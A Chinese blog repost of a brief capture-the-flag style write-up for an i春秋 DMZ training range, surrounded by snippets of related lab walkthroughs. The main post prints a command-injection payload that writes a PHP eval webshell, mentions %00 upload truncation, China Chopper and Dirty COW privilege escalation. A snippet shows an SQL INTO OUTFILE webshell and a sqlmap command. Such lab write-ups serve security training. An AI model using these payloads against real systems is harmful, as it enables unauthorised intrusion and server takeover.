i春秋DMZ大型靶场实验(三)内网转发DMZ2

最新推荐文章于 2024-03-02 15:00:00 发布
最新推荐文章于 2024-03-02 15:00:00 发布
阅读量254 收藏
点赞数
原文链接:http://www.cnblogs.com/feizianquan/p/11178319.html
版权

 

更具实验文件知道存在源码泄露  下载源码进行源码审计

发现admin账号

查看user.php 发现mysql 账号 端口

对登录后源码进行审计 发现上传文件的两处漏洞

对 fiel name 可以 %00 截断 上传一句话木马   对file name   shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如 

'|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||'

 

菜刀连接

 上传脏牛提权

 

转载于:https://www.cnblogs.com/feizianquan/p/11178319.html

weixin_30549175
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
渗透系列:红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记(拿下win2008s)
weixin_54626591的博客
01-18 207
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记(拿下win2008s)
记一次对i春秋某网络靶场平台的渗透
qq_20065991的博客
09-02 1551
如下图所示即为这次渗透的目标 i春秋网络靶场平台 在用户中心的站内信功能中发现了非常有意思的事情,在发送站内信的时候接收用户的username会自动补全。 想起来老师下发账号的时候给了我们一个文件里面有我们整个班级的用户名和密码,盲猜应该管理员存在弱口令 如上图,猜测管理员账号密码也是123456 在人员管理页面发现可以修改用户名的密码,竟然还不用验证 抓包看一眼,竟然是用userid来传递参数的,那这感觉冥冥之中就存在越权漏洞呀 将userid修改为1,返回包u...
i春秋DMZ大型靶场实验(四)Hash基础
weixin_30493401的博客
07-13 206
下载工具包 打开目标机 通过目录爆破发现 phpmyadmin 在登录位置尝试注入 返现 可以注入 直接上sqlmap 上 bp 代理抓包 sqlmap.py -r bp.txt --dbs 利用sqlmap 跑出root 密码 root666888 登录 phpmyadmin t通过路径报错得到绝对路径 c:\\www\\1.php...
i春秋DMZ大型靶场实验(二)提权漏洞
weixin_30414635的博客
07-12 307
拿到靶场 直接进行扫描 爆破路径 发现 phpinfo, phpmyadmin 更具phpinfo 获取跟路径 也可以通过 输入错路径爆出绝对路径 phpmyamin 弱口令登录 root,root sql 直接写一句话木马 select '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\...
i春秋DMZ大型靶场实验(一)内网拓展
qq_35382207的博客
08-24 315
更具提示 先下载工具包 ip 172.16.12.226 打开bp 进行代理发现 整个页面 没有请求 没有其页面通过 御剑,dir ,hscan 进行目录爆破未发现有用信息 对当前页面进行代码审计发现png 二级图片路径 在对二级目录爆破 发现 upload.php 上传页面 尝试上传 把工具包内 上传 htaccess 内文件把 chopper.ccc 解析成php 文件 直接上传 返利他的dolowd.php 暴露上传后路径 ...
2021-8-29《内网安全攻防》第一章内网基础知识
qq_45290991的博客
08-30 940
这是MS08067实验室的作品,我看的过程中做了一些笔记,算是复习+学习吧。 第一章、内网基础知识 工作组: 所有计算机对等,没有cs之分。相当于分小组,加入、创建工作组:右键“计算机”--->属性--->更改设置--->在“计算机名”的一栏中写入想好的名称,在“工作组”一栏中写入想要加入的工作组名称。退出工作组:同法改变工作组名称即可。 域:有安全边界的计算机集合。分为: 单域:一个域,一般一个域需要两个dc,因为一个dc坏了还能备份恢复回来 父域 域树,子域只能使用父..
家庭内网新布局
evling2020的博客
03-13 394
大纲背景区域划分网段设定机器命名规范虚拟化选型区域访问控制设定动态扩展节点外网访问控制疑惑排解结语 背景 近些时日,易雾君忙着对家庭内网结构做了番大调整,kvm 虚机尽全力向 lxc 容器转化,区域划分明确,规定好相互访问控制策略,并且让动态增加网络节点提供了便利,使整个网络的管理有章可循,重点解决了跨设备的网络隔离问题。 区域划分 根据前期很长一段时间对家庭网络的实践,易雾君初步对内网划分了 9 个区域如下: 区域中文名称 区域英文名称 区号 职能描述 网管区 net_mgr 00 放置具
红日安全内网渗透笔记
VB551的博客
04-10 4700
靶场下载地址:漏洞详情 环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC 第一步:信息收集 已知WEB机的IP地址,用syn包进行扫描。 nmap -sS -v 192.168.111.80 获得端口开放 ...
i春秋春秋云镜系列所有靶场
qq_47289634的博客
07-03 1675
该CMS的welcome.php中存在SQL注入攻击。多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。
春秋云境】CVE-2022-32991靶场wp
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境系列靶场记录(合集)-不再更新
最新发布
Karka_的博客
03-02 848
CVE-2022-32991:该CMS的welcome.php中存在SQL注入攻击。春秋云境:CVE-2022-30887CVE-2022-30887:多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的,该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
DMZ靶场渗透
dda6607的博客
06-19 483
0x00 目标站点www.test.ichunqiu 0x01 尝试登陆系统 -尝试弱密码登陆 结果:forbidden!!! -尝试万能账号密码登陆 1‘ or 1=1--+ 和 1‘ or 1=1--+ 结果:forbidden!!! 从登陆入口得不到其他更多的有效信息,所以从其他地方找突破口 0x02 使用御剑后台扫描工具对站点进行扫面 -开...
幻云蜜网筑迷阵 春秋靶场信安大赛从攻击者角度看安全
weixin_34151004的博客
11-16 360
微暗的灯光,在不绝于耳的键盘鼠标噼啪作响生中,30个小时的时间分秒流逝... ...靶场实战作为网络信安演戏的一种实践越来越能够吸引安全圈儿的目光了,高效仿真且兼顾趣味性的靶场攻防实战能够有效的展现防御系统的防护能力,并比渗透测试等其他网络安全测试和自查手段更胜一筹,更能探究黑客思路,让守方做到“安全先行”。2017年9月5日,广州锦行网络科技有限公司...
i春秋url地址编码问题
weixin_30378623的博客
11-19 137
i春秋学院是国内比较知名的安全培训平台,前段时间看了下网站,顺便手工简单测试常见的XSS,发现网站搜索功能比较有意思。 其实是对用户输入的内容HTML编码和URL编码的处理方式在这里不合理,提交到乌云被拒绝了,因为确实没啥危害,因此技术BLOG记录下。 如搜索:http://www.ichunqiu.com/search/ab<>,搜索内容为ab<>,页面会把<&...
内网DMZ、外网之间的访问规则
热门推荐
Bingo的博客
07-03 1万+
两个防火墙之间的空间被称为DMZ。与Internet相比,DMZ可以提供更高的安全性,但是其安全性比内部网络低。DMZ是英文“demilitarized zone”的缩写,中文名称为“隔离区”,也称“非军事化区”。 当规划一个拥有DMZ的网络时候,我们可以明确各个网络之间的访问关系,可以确定以下六条访问控制策略。 1. 内网可以访问外网。 内网的用户显然需要自由地访问外网。在这一策略中,防火墙需要进行源地址转换。 2. 内网可以访问DMZ。 此策略是为了方便内网用户使用和管理DMZ中的..
如何通过靶机ip来获取目标主机数据
doucha3153的博客
03-12 3557
大家好,这是我的第一篇博客,如有问题的话请在下方留言! 如何通过靶机ip来获取目标数据库 靶机ip:192.168.*.* 先进行访问以下靶机ip看看是一个什么样的页面,正常情况下需要在打开页面后检查一下,一般在页面中会有遗留的信息在里面(仔细找一下),在这里我就用我之前所搭建的一个win2008(环境:php5.4+mysql+win2008r2)来做一下演示。 我现在将靶机ip写入到host...
Iperf测试端口转发DMZ功能实战指南
在本文档中,我们重点关注如何利用Iperf测试端口转发、触发和DMZ功能。首先,理解Iperf的基本参数至关重要: - `-f`:用于指定报告的单位,如Kbits、Mbits、KBytes或MBytes,默认为Mbits。 - `-i`:设置报告间隔,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值